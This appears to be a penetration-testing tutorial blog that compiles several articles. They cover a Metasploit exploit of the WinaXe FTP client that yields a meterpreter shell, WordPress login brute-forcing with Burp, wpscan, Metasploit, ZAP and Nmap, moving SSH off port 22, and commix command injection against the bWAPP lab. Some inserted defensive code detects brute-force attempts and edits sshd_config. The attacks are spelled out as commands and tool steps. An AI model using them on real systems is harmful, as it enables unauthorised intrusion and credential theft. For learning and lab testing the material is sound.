Exploit Windows 10 pc using WinaXe 7.7 FTP Client Remote Buffer Overflow


Exploit Targets
WinaXe 7.7 FTP client

Requirement
Attacker: Kali Linux
Victim PC: Windows 10


Open a Kali terminal and type msfconsole


msf exploit(winaxe_server_ready) > set lhost 192.168.0.106
msf exploit(winaxe_server_ready) > set srvhost 192.168.0.106
msf exploit(winaxe_server_ready) > exploit


Now send the link to the victim. When the victim enters the connection details in the WinaXe FTP client and waits for the FTP connection, you will get the victim's meterpreter session.



5 ways to Brute Force Attack on Wordpress Website

Brute force attack using Burp Suite


To make Burp Suite work we first have to turn on the browser's manual proxy: go to the browser settings and choose Preferences, then select the Advanced option, go to Network and select Settings.


Now select Manual proxy configuration, type your localhost address in the HTTP Proxy field, set the port to 8080 and click OK.


Now open WordPress in your browser; it will ask for the username and password. Before entering them, start Burp Suite, select the Proxy tab and turn on interception by clicking the Intercept is on/off button.


With interception on, type any guess for the password so that Burp Suite can capture the request. Look at the image and notice the last line of the captured data: it shows that I tried to log in with admin:admin as username and password respectively.


Send the captured request to Intruder by right-clicking in the request area and choosing Send to Intruder, or simply press Ctrl+I.


Now open the Intruder tab and select the Positions tab. Without disturbing the data, click the Clear button on the right side of the frame.


Now select the fields I have selected in the image and click the Add button on the right side of the frame. This configures the positions where payloads will be inserted into the base request.


Select the attack type, which determines how payloads are assigned to the payload positions. I will choose Cluster bomb, since the number of payload sets depends on the attack type and we have two payload positions. Click Start attack.


Click on Payload set, which shows the numbers 1 and 2; select 1 for the first payload position. Then click the Load button in Payload options and configure a simple list of strings to use as payloads, or add the path of a dictionary containing usernames only. Similarly select 2 for the other payload position and add the path of a dictionary containing passwords only. Click Start attack.

The brute-force attack will now try every combination of the two payload sets as username and password.

When the attack has finished you can pick out the correct credentials by checking the Status and Length columns, which differ from the rest of the combinations.

From the result, user:bitnami are the username and password respectively.



Brute force attack using wpscan
WPScan is a black-box vulnerability scanner for WordPress that is installed by default in Kali Linux. For a WordPress brute force you need a good dictionary, or you can make your own dictionary for the attack.

ruby ./wpscan.rb --url 192.168.1.14 --wordlist /root/Desktop/pass.txt --username user

In this brute-force attack I have supplied a wordlist for the password only. From the result, user:bitnami are the login and password respectively.



Brute force attack using metasploit
This module will test WordPress logins on a range of machines and report successful logins. If you have loaded a database plug-in and connected to a database, this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.4
msf auxiliary(wordpress_login_enum) > set rport 80
msf auxiliary(wordpress_login_enum) > set user_file /root/Desktop/user.txt
msf auxiliary(wordpress_login_enum) > set pass_file /root/Desktop/pass.txt
msf auxiliary(wordpress_login_enum) > exploit

The WordPress brute force succeeded with user:bitnami as username and password.


Brute force attack using OWASP ZAP
ZAP is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. Now we will use it for a brute-force attack; the whole process is the same as with Burp Suite.

Start OWASP ZAP and turn on the browser's manual proxy: go to the settings and choose Preferences, then select the Advanced option, go to Network and select Settings. Select Manual proxy configuration, type your localhost address in the HTTP Proxy field, set the port to 8080 and click OK.

Now once again open WordPress in your browser; it will ask for the username and password.



ZAP captures the data; as you can see, I have logged in with user as the username and password as the password. You can see it in the Request section of the tool. Select the characters you entered on the page before; I will select only the password in the captured data, then right-click and choose the Fuzz option.



When you click Fuzz, a new Fuzzer window opens. Click the Add button on the left of the frame; this opens a new Add Payload window. Click Select and choose your dictionary for the attack.

Click Add again and then click Start Fuzzer.



After starting the fuzzer a new screen opens. Click the Options button, select the Depth first radio button for the payload replacement strategy, tick the Follow redirects check box and click Start Fuzzing.


When the attack has finished you can pick out the correct credential by checking the State and Size Response Header columns, which differ from the rest of the combinations.

From the result, bitnami is the password for the login user.


Brute force attack using Nmap

This script uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are stored using the credentials library.

Open a Kali terminal and type the following Nmap command:

nmap -sV --script http-wordpress-brute --script-args 'userdb=/root/Desktop/login.txt,passdb=/root/Desktop/pass.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.17
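All five methods above hammer the same endpoint, wp-login.php, so on the defending side the signal is a burst of failed login POSTs from one address. As an added example (not part of the original article), a small detector over constructed Apache combined-format log lines; the log lines, the 5-in-a-minute threshold and the status-code convention described in the docstring are assumptions for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (not from a real server): one fast guesser,
# one slow guesser, and one successful login (302) after the fast guesser's failures.
SAMPLE_LOG = """\
192.168.1.20 - - [10/Mar/2017:10:15:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4150
192.168.1.20 - - [10/Mar/2017:10:15:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4150
192.168.1.20 - - [10/Mar/2017:10:15:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4150
192.168.1.20 - - [10/Mar/2017:10:15:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4150
192.168.1.20 - - [10/Mar/2017:10:15:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4150
192.168.1.20 - - [10/Mar/2017:10:15:04 +0000] "POST /wp-login.php HTTP/1.1" 302 0
192.168.1.40 - - [10/Mar/2017:11:00:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4150
192.168.1.40 - - [10/Mar/2017:11:30:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4150
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"].split("?", 1)[0],
            "status": int(m["status"])}

def detect_wp_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Return {ip: total_failures} for IPs with `threshold` failed wp-login.php
    POSTs inside any `window`. WordPress re-renders the form with HTTP 200 on a
    bad password and answers 302 on success, so only 200s count as failures."""
    fails = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"] == "/wp-login.php" \
                and ev["status"] == 200:
            fails[ev["ip"]].append(ev["ts"])
    flagged = {}
    for ip, times in fails.items():
        times.sort()
        for i in range(threshold - 1, len(times)):
            # `threshold` consecutive failures whose first and last fall inside the window
            if times[i] - times[i - threshold + 1] <= window:
                flagged[ip] = len(times)
                break
    return flagged
```

The slow guesser (two attempts half an hour apart) is only caught when the window is widened, which is the usual trade-off between catching wpscan-style bursts and throttled dictionary runs.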

How to Secure SSH Port using Port Forwarding (Beginner Guide)

In this article I am going to show how to use port forwarding on a system. Port forwarding is a process that redirects a communication request from a specific port to another port or host; it basically allows an outside computer to connect to a computer in a private local area network. Commonly forwarded ports include port 22 for SSH access and port 80 for web servers. The major advantage is that it provides security to your private network and secures communication.
Requirement: Kali Linux

Let's start!
Open a terminal and type the following command to install openssh-server on your system.

apt-get install openssh-server


After installing the application we need to start the service on our computer, which starts SSH for communication; then we check whether the service is running or stopped.
service ssh start
service ssh status

Yes, the SSH service is active and you can see its running status with the time and date.
As we know, port 22 is used for SSH, and here the server is listening on port 22.
If I want to check whether port 22 is open or closed I use the nmap tool to scan the host with the basic command.
SCAN YOUR HOST

root@kali:~# nmap 192.168.0.103


From the result of the nmap scan I found port 22 open under the service ssh.
Port 22 is badly affected by DDoS attacks; if an attacker finds port 22 open for SSH, they will start attacking the server. For security purposes administrators use port forwarding techniques.
Let me show how to forward a specific port to another port.

PORT FORWARD TECHNIQUE
In Kali Linux open the file sshd_config from Computer > etc > ssh > sshd_config


Please look at line no. 3: here the protocol is listening on port 22. Now just replace 22 with 1923 and save the file without changing its path.



service ssh restart
So now the protocol is listening on port 1923 in place of 22. Let me confirm this with an nmap scan.
USE NMAP
nmap -p 1-65535 192.168.0.103


Now if anybody else scans your IP they will have no idea that the SSH service is running on port 1923, because the result shows 1923 as open under the spice service.
The basic Nmap scan failed, because we are not getting the proper result from it. If you have good knowledge of Nmap, use the advanced command.
nmap -p- -A 192.168.0.103
The aggressive scan is successful; this scan probes port, protocol and service, and as you can see, port 1923 is open for the ssh service.


USE TELNET
The same result can be found with telnet when you connect to the host on port no. 1923.
telnet 192.168.0.103 1923
So if you find any port open, just try to connect with telnet and you will learn which service is running on that particular port. Look at the image: the result is very clear that port 1923 is listening for ssh.


USE NETCAT
For the same purpose, using netcat you will be able to find the current service for which 1923 is open.
nc 192.168.0.103 1923


This entire task can also be performed on a Windows system.
To check whether port 22 is open or closed, again use an Nmap scan:
nmap 192.168.0.103


From the result of the Nmap scan I found port 22 open under the service ssh.
Open the file sshd_config from My Computer > Local Disk (C:) > Program Files > OpenSSH > etc > sshd_config


Here the protocol is listening on port 22; now just replace 22 with 3221 and save the file.


So now the protocol is listening on port 3221 in place of 22.


Now open a command prompt and type the following commands to restart the SSH service on your system.
C:\WINDOWS\SYSTEM32>net stop opensshd
C:\Users\RAJ>net start opensshd


Let me confirm this with an Nmap scan.
nmap -A 192.168.0.103


It is clear from the aggressive scan that SSH is running on port 3221 instead of port 22.
In this way we can also breach port forwarding.
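Both walk-throughs above (Kali and Windows) edit sshd_config by hand. As an added example that is not from the article, the same change done programmatically with the two checks a hand edit tends to skip: the stock file ships with the Port line commented out, and a Port directive placed after a Match block is rejected by sshd. The config excerpt and the function names are constructed for this example.

```python
import re

# Constructed sshd_config excerpt for this example (not the article's file). The
# stock file ships "Port" commented out, which is why sshd listens on 22.
SAMPLE_SSHD_CONFIG = """\
#Port 22
#AddressFamily any
ListenAddress 0.0.0.0
PermitRootLogin no
Match User backup
    PasswordAuthentication no
"""

PORT_LINE = re.compile(r"^\s*#?\s*Port\s+(\d+)\s*$", re.IGNORECASE)
MATCH_LINE = re.compile(r"^\s*Match\b", re.IGNORECASE)

def set_sshd_port(config_text, new_port):
    """Return sshd_config text that listens on `new_port`.
    Replaces the first active or commented-out Port line above any Match block;
    if there is none, inserts one before the first Match block, because sshd
    rejects global directives that appear after Match."""
    if not 1 <= new_port <= 65535:
        raise ValueError(f"port out of range: {new_port}")
    lines = config_text.splitlines()
    replaced = False
    for i, line in enumerate(lines):
        if MATCH_LINE.match(line):
            break                      # everything below is per-Match only
        if PORT_LINE.match(line):
            lines[i] = f"Port {new_port}"
            replaced = True
            break
    if not replaced:
        idx = next((i for i, l in enumerate(lines) if MATCH_LINE.match(l)), len(lines))
        lines.insert(idx, f"Port {new_port}")
    return "\n".join(lines) + "\n"

def effective_port(config_text):
    """Port sshd will actually use: the first uncommented Port directive above
    any Match block, or the default 22 when none is set."""
    for line in config_text.splitlines():
        if MATCH_LINE.match(line):
            break
        m = re.match(r"^\s*Port\s+(\d+)\s*$", line, re.IGNORECASE)
        if m:
            return int(m.group(1))
    return 22
```

As the article's own aggressive scan, telnet and netcat results show, the SSH banner still identifies the service on the new port, so treat the move as noise reduction against scanners, not as access control.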

bWAPP Command Injection Exploitation using Commix (Bypass All Security)

Command injection is an attack whose goal is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:


Requirement:
Xampp/Wamp Server
bWAPP Lab
Kali Linux: Burp suite, Commix tool

First you need to set up the bWAPP lab in your XAMPP or WAMP server; for this you can visit my previous article, web pentest lab setup using bWAPP, here.

Now I am going to perform an OS command injection attack using bWAPP.

Start the Apache and MySQL services in XAMPP or WAMP. Open the localhost address in the browser; I am using 192.168.1.103:81/bWAPP/login.php. Enter the user and password bee and bug respectively.

My task is to bypass all three security levels in bWAPP through OS command injection.

Let's start!

Set security level: low


Look at the image below: I have set the security level to low. From Choose your bug select OS Command Injection and click Hack.


Type the IP in the DNS lookup field and, just after that, start Burp Suite in Kali Linux. Don't forget to set the proxy in your browser while using Burp Suite.

To capture the bWAPP cookie, click the Proxy option, then click the Intercept is on button, come back to bWAPP and now click DNS.

As you can see, I have captured the cookie in Burp Suite.


Open the terminal in Kali Linux and type the commix command.

From the data captured in Burp Suite copy the referer, cookie and target, and use them in the following command:

commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=0" --data="target=192.168.1.103&form=submit"

This command runs the commix tool in the terminal, which automatically performs the command injection attack using the URL and cookie information from bWAPP.

Type 'y' to resume the classic injection point and to get a pseudo-terminal shell.

The attack is successful: commix has provided an OS shell.

Commix (os_shell) > systeminfo


Set security level: medium

Look at the image below: now I have set the security level to medium. From Choose your bug select OS Command Injection and click Hack.


Repeat the process as above: type the IP in the DNS lookup field and just after that start Burp Suite.
Click Intercept is on, come back to bWAPP and now click DNS. As you can see, I have captured the cookie for the medium level in Burp Suite.


From the data captured in Burp Suite copy the referer, cookie and target, and use them in the following command:

commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=1" --data="target=192.168.1.103&form=submit"

Type 'y' to resume the classic injection point and to get a pseudo-terminal shell.

The attack is successful at medium security, and again commix has provided an OS shell.

Commix (os_shell) > ipconfig


Set security level: high

After achieving an OS shell at low and medium, my next target is high security; now I am trying to bypass this level by repeating the same process once again.

Set security to high, choose your bug OS Command Injection and click Hack.


Type the IP in the DNS lookup field and just after that start Burp Suite in Kali Linux. From the data captured in Burp Suite copy the referer, cookie and target, and use them in the following command:


commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=2" --data="target=192.168.1.103&form=submit"

Type 'y' to resume the classic injection point and to get a pseudo-terminal shell. We have successfully bypassed the high level as well with the same process.

Commix (os_shell) > systeminfo